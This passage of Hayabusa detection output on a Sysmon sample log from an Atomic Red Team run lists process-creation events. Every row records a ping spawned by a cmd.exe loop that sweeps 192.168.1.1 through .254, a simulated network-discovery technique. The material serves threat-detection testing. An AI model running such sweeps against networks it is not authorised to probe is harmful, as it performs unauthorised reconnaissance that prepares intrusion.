+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.50 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5224 | PGUID: 747F3D96-D90F-5D31-0000-00109F913400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:00.063 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.51 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4380 | PGUID: 747F3D96-D910-5D31-0000-001050953400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:00.515 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.52 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4544 | PGUID: 747F3D96-D910-5D31-0000-00108F983400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:00.940 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.53 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4260 | PGUID: 747F3D96-D910-5D31-0000-0010BFA43400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:01.546 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.54 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3872 | PGUID: 747F3D96-D911-5D31-0000-001087AD3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:02.018 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.55 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1256 | PGUID: 747F3D96-D912-5D31-0000-001072B03400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:02.565 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.56 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5656 | PGUID: 747F3D96-D912-5D31-0000-00105CB33400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:03.059 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.57 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4792 | PGUID: 747F3D96-D913-5D31-0000-00105AB63400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:03.520 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.58 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5676 | PGUID: 747F3D96-D913-5D31-0000-001044B93400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:04.024 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.59 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5968 | PGUID: 747F3D96-D914-5D31-0000-001030BC3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:04.522 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.60 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7156 | PGUID: 747F3D96-D914-5D31-0000-00102DBF3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:05.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.61 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4172 | PGUID: 747F3D96-D915-5D31-0000-001017C23400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:05.516 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.62 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1628 | PGUID: 747F3D96-D915-5D31-0000-001002C53400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:06.019 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.63 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 680 | PGUID: 747F3D96-D916-5D31-0000-0010ECC73400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:06.440 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.64 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6600 | PGUID: 747F3D96-D916-5D31-0000-0010B1D03400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:07.053 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.65 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5468 | PGUID: 747F3D96-D917-5D31-0000-00109BD33400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:07.413 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.66 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4052 | PGUID: 747F3D96-D917-5D31-0000-001085D63400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:08.043 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.67 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6220 | PGUID: 747F3D96-D918-5D31-0000-00106FD93400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:08.500 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.68 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5348 | PGUID: 747F3D96-D918-5D31-0000-001059DC3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:09.012 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.69 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 976 | PGUID: 747F3D96-D919-5D31-0000-00109EDF3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:09.474 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.70 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 396 | PGUID: 747F3D96-D919-5D31-0000-001088E23400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:10.014 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.71 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1200 | PGUID: 747F3D96-D91A-5D31-0000-001072E53400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:10.522 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.72 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4664 | PGUID: 747F3D96-D91A-5D31-0000-00105CE83400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:11.031 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.73 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2804 | PGUID: 747F3D96-D91B-5D31-0000-001046EB3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:11.504 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.74 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2180 | PGUID: 747F3D96-D91B-5D31-0000-00100BF43400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:12.023 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.75 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6080 | PGUID: 747F3D96-D91C-5D31-0000-0010F5F63400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:12.547 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.76 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6308 | PGUID: 747F3D96-D91C-5D31-0000-0010DFF93400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:13.030 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.77 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5692 | PGUID: 747F3D96-D91D-5D31-0000-0010CAFC3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:13.489 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.78 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4092 | PGUID: 747F3D96-D91D-5D31-0000-0010B7FF3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:14.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.79 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6516 | PGUID: 747F3D96-D91E-5D31-0000-0010A1023500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:14.552 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.80 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1232 | PGUID: 747F3D96-D91E-5D31-0000-00108E053500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:15.051 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.81 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3164 | PGUID: 747F3D96-D91F-5D31-0000-001079083500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:15.548 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.82 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5612 | PGUID: 747F3D96-D91F-5D31-0000-0010640B3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:16.040 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.83 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2288 | PGUID: 747F3D96-D920-5D31-0000-00104E0E3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:16.584 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.84 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1684 | PGUID: 747F3D96-D920-5D31-0000-0010A6183500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:17.041 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.85 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1060 | PGUID: 747F3D96-D921-5D31-0000-0010921B3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:17.511 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.86 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3744 | PGUID: 747F3D96-D921-5D31-0000-00107C1E3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:18.015 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.87 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3068 | PGUID: 747F3D96-D922-5D31-0000-001066213500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:18.509 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.88 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6312 | PGUID: 747F3D96-D922-5D31-0000-001063243500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:18.990 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.89 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3116 | PGUID: 747F3D96-D922-5D31-0000-001053273500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:19.541 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.90 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3868 | PGUID: 747F3D96-D923-5D31-0000-00103D2A3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:20.006 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.91 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1020 | PGUID: 747F3D96-D924-5D31-0000-0010272D3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:20.543 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.92 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2292 | PGUID: 747F3D96-D924-5D31-0000-001024303500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:21.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.93 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3612 | PGUID: 747F3D96-D925-5D31-0000-00106C3C3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:21.488 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.94 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5852 | PGUID: 747F3D96-D925-5D31-0000-0010563F3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:22.030 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.95 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6288 | PGUID: 